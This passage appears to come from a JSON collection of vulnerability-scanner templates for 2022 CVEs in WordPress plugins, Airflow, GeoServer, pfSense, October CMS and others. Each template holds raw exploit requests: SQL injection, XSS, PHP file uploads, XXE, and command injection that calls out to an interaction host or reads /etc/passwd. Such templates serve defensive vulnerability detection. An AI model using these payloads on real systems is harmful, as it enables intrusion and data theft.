\"text/html\")","status_code_4 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["_wpnonce=([0-9a-z]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-4305","info":{"name":"Login as User or Customer < 3.3 - Privilege Escalation","severity":"critical"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\nHost: {{Hostname}}\nCookie: loginas_old_user_id=1\n","GET /wp-admin/users.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')"],"condition":"and"}]}]},{"id":"CVE-2022-38870","info":{"name":"Free5gc 3.2.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /api/subscriber HTTP/1.1\nHost: {{Hostname}}\nToken: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"plmnID\":","\"ueId\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-45365","info":{"name":"Stock Ticker <= 3.23.2 - Cross-Site-Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stockticker_symbol_search_test&symbol=test&endpoint=%3Cimg+src%3Dx+onerror%3D%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%28document.domain%29%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Stock Ticker Fatal","<IMG SRC=X ONERROR="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31846","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/live_mfg.shtml"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","DefaultIP=","LOGO1="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44290","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /approvals/deleteapprovalstages.php?id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, 'Delete the following?')"],"condition":"and"}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-4328","info":{"name":"WooCommerce Checkout Field Manager < 18.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name={{randstr}}.pHp HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------22728be7b3104597\n\n--------------------------22728be7b3104597\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------22728be7b3104597--\n","GET /wp-content/uploads/cfom_files/{{to_lower('{{randstr}}')}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]}]}]},{"id":"CVE-2022-0735","info":{"name":"GitLab CE/EE - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8","1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7","1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","2cb8d6d6d17f1b1b8492581de92356755b864cbb6e48347a65baa2771a10ae4f","2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be","301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7","50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9","515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de","5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4","5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f","62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51","655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f","6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb","6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef","775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df","79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9","7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5","81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3","8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353","90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159","969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e","a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528","a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d","a573aed3df818ca78ab40c01ae3514e16271a18e3c83122deab5d5623b25d4fe","a624c11e908db556820e9b07de96e0a465e9be5d5e6b68cdafe6d5c95c99798b","a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2","a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9","ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5","ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8","b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711","ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1","be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a","bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4","bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218","c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4","c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209","c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c","cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5","d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71","d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb","e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a","e355f614211d036d0b3ffac4cd76da00d89e05717df61629e82571e20ac27488","e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee","ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d","f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812","f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac","f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"],"condition":"or"}],"extractors":[{"type":"regex","group":1,"regex":["(?:application-)(\\S{64})(?:\\.css)"]}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-3982","info":{"name":"WordPress Booking Calendar <3.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------1cada150a8151a54\n\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"action\"\n\nwpdevart_form_ajax\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_id\"\n\nx\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_nonce\"\n\n{{nonce}}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart_data\"\n\n{\"wpdevart-submit\":\"X\"}\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"wpdevart-submit\"\n\n1\n--------------------------1cada150a8151a54\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: application/octet-stream\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n--------------------------1cada150a8151a54--\n","GET /wp-content/uploads/booking_calendar/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["var wpdevart.*\"ajaxNonce\":\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2022-0666","info":{"name":"Microweber < 1.2.11 - CRLF Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2022-24384","info":{"name":"SmarterTools SmarterTrack - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /Main/Default.aspx?viewSurveyError=Unknown+survey\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n\n"],"matchers":[{"type":"word","words":["\"type\":\"error\",\"text\":\"Unknown survey\\\"><img src=x onerror=alert(document.domain)>\"","smartertrack"],"condition":"and"}]}]},{"id":"CVE-2022-43165","info":{"name":"Rukovoditel <= 3.2.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&notes=&sort_order=\n"],"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-1329","info":{"name":"Elementor Website Builder - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=336b29d7aee0463d8b651303eab505ea\n\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"action\"\n\nelementor_upload_and_install_pro\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"_nonce\"\n\n{{nonce}}\n--336b29d7aee0463d8b651303eab505ea\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"{{randstr}}.zip\"\n\n{{base64_decode(\"UEsDBBQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAZWxlbWVudG9yLXByby9VVA0AB8csB2TILAdkxywHZHV4CwABBOgDAAAE6AMAAFBLAwQUAAgACAB8KGdWAAAAAAAAAAA6BAAAHwAgAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAKVSXU/bQBB8rn/FgqryoXyUoFZqKAUTnBCJhshxQKiq0Nlex6ee705354T8++45AfLQ9qVv9u3s7OzMfr3QpQ66x8cBHMNU1AsuYcIq7EMksELplIGpUb56jTYzXDuuZB+SEncQD5ha7hCuai5yNFAyC9wBE6IPuWELYDKnD6VBswVCuoG1QPNnFKDRFJg5yNHyhWxBpVIuEAxaraTlSwTMueNy0Wp4KmWwAyN0YB0zDnOQarW3o38ej/tQOqdtv9vFF5GdTFXdi9pVT1bVJsPzlW7rpsF+8K8ZqzSj+eebx3ZtePNe0fC68uic2dKPCWtXKrPjkKf2hXs0tnHntPO5c/IG/V9FrGH5uyI/KcFnB9eqYpzmv47YFi81y35556OdAlxmzOFCmTUMyNIt9C1UbqEwiGBV4VbM0EmsVQ0Zk5RMzq0zPK0pc5+zzLvUUKmcF2tPQm+19Ifg6EwcmsqCKpqf0WRO0Uk0TMC0TgXP4JZnKC0C3Yz2L7akSNOGx3cMvYbZVgMMFREzf4MtQE51A8uN63D6MmNL2ILNmkyuQdCmr8jOn1Z92ygHuiHPUypN6kvm/D4rLgSkCLXFohYt309geBgnN3fzBMLJIzyEcRxOksczAlNgVMUlbqh4pQUnZtrBMOnWJNUzfI/iwQ21hFfj23HySIJhOE4m0WwGw7sYQpiGcTIezG/DGKbzeHo3izowQ6/K5/UvN4smEHIsR8e4sH7pbhAEvIDDPW4tusP3T6Mo+XHAMseX5M/Bz6Oj4J1BVxt5FgSYlQqq/NPh/uA+avc+9nrtk9Pel/0jqgUX34LfUEsHCH5L6n9mAgAAOgQAAFBLAQIUAxQAAAAAAPEiZ1YAAAAAAAAAAAAAAAAOACAAAAAAAAAAAAD9QQAAAABlbGVtZW50b3ItcHJvL1VUDQAHxywHZMgsB2THLAdkdXgLAAEE6AMAAAToAwAAUEsBAhQDFAAIAAgAfChnVn5L6n9mAgAAOgQAAB8AIAAAAAAAAAAAALSBTAAAAGVsZW1lbnRvci1wcm8vZWxlbWVudG9yLXByby5waHBVVA0ABzw2B2Q9NgdkPDYHZHV4CwABBOgDAAAE6AMAAFBLBQYAAAAAAgACAMkAAAAfAwAAAAA=\")}}\n--336b29d7aee0463d8b651303eab505ea--\n","GET /index.php?activate=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["5f9bc5edd71c78284dabe630df8cd71d"]}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["admin-ajax.php\",\"nonce\":\"([0-9a-zA-Z]+)\"}"],"internal":true}]}]},{"id":"CVE-2022-24264","info":{"name":"Cuppa CMS v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nsearch_word=')+union+all+select+1,md5('{{num}}'),3,4,5,6,7,8--+-&order_by=id&order_orientation=ASC&path=component%2Ftable_manager%2Fview%2Fcu_countries&uniqueClass=wrapper_content_518284\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(num)}}","td_available_languages"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0963","info":{"name":"Microweber <1.2.12 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /plupload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------59866212126262636974202255034\nReferer: {{BaseURL}}admin/view:modules/load_module:files\n\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.xml\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunk\"\n\n0\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"chunks\"\n\n1\n-----------------------------59866212126262636974202255034\nContent-Disposition: form-data; name=\"file\"; filename=\"blob\"\nContent-Type: application/octet-stream\n\n<x:script xmlns:x=\"http://www.w3.org/1999/xhtml\">alert(document.domain)</x:script>\n-----------------------------59866212126262636974202255034--\n","GET /userfiles/media/default/{{to_lower(\"{{randstr}}\")}}.xml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body_3,\"alert(document.domain)\")","status_code_3==200","contains(body_2,\"bytes_uploaded\")"],"condition":"and"}]}]},{"id":"CVE-2022-24816","info":{"name":"GeoServer <1.2.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /geoserver/wms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n  <wps:Execute version=\"1.0.0\" service=\"WPS\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns=\"http://www.opengis.net/wps/1.0.0\" xmlns:wfs=\"http://www.opengis.net/wfs\" xmlns:wps=\"http://www.opengis.net/wps/1.0.0\" xmlns:ows=\"http://www.opengis.net/ows/1.1\" xmlns:gml=\"http://www.opengis.net/gml\" xmlns:ogc=\"http://www.opengis.net/ogc\" xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n    <ows:Identifier>ras:Jiffle</ows:Identifier>\n    <wps:DataInputs>\n      <wps:Input>\n        <ows:Identifier>coverage</ows:Identifier>\n        <wps:Data>\n          <wps:ComplexData mimeType=\"application/arcgrid\"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>script</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec(\"cat /etc/passwd\").getInputStream())); String line = null; String allLines = \" - \"; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n      <wps:Input>\n        <ows:Identifier>outputType</ows:Identifier>\n        <wps:Data>\n          <wps:LiteralData>DOUBLE</wps:LiteralData>\n        </wps:Data>\n      </wps:Input>\n    </wps:DataInputs>\n    <wps:ResponseForm>\n      <wps:RawDataOutput mimeType=\"image/tiff\">\n        <ows:Identifier>result</ows:Identifier>\n      </wps:RawDataOutput>\n    </wps:ResponseForm>\n  </wps:Execute>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","ExceptionInInitializerError"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31845","info":{"name":"WAVLINK WN535 G3 - Information Disclosure","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /live_check.shtml HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Model=","FW_Version=","LanIP="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42749","info":{"name":"CandidATS 3.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","candidat"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2022-43140","info":{"name":"kkFileView 4.1.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"],"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21705","info":{"name":"October CMS -  Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onSave\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onCreateTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&type=page\n","POST /backend/cms HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-OCTOBER-REQUEST-HANDLER: onOpenTemplate\nX-OCTOBER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["function onInit()","phpinfo()","Safe mode is currently enabled. Editing the PHP code of CMS templates is disabled. To disable safe mode, set the `cms.enableSafeMode` configuration value to `false`."],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"xpath","name":"session_key","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[1]"],"attribute":"value"},{"type":"xpath","name":"token","internal":true,"xpath":["/html/body/div[1]/div/div[2]/div/div/form/input[2]"],"attribute":"value"},{"type":"regex","name":"theme","group":1,"regex":["<input\\stype=\\\\\"hidden\\\\\"\\svalue=\\\\\"demo\\\\\"\\sname=\\\\\"([^\"]*)\\\\\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site 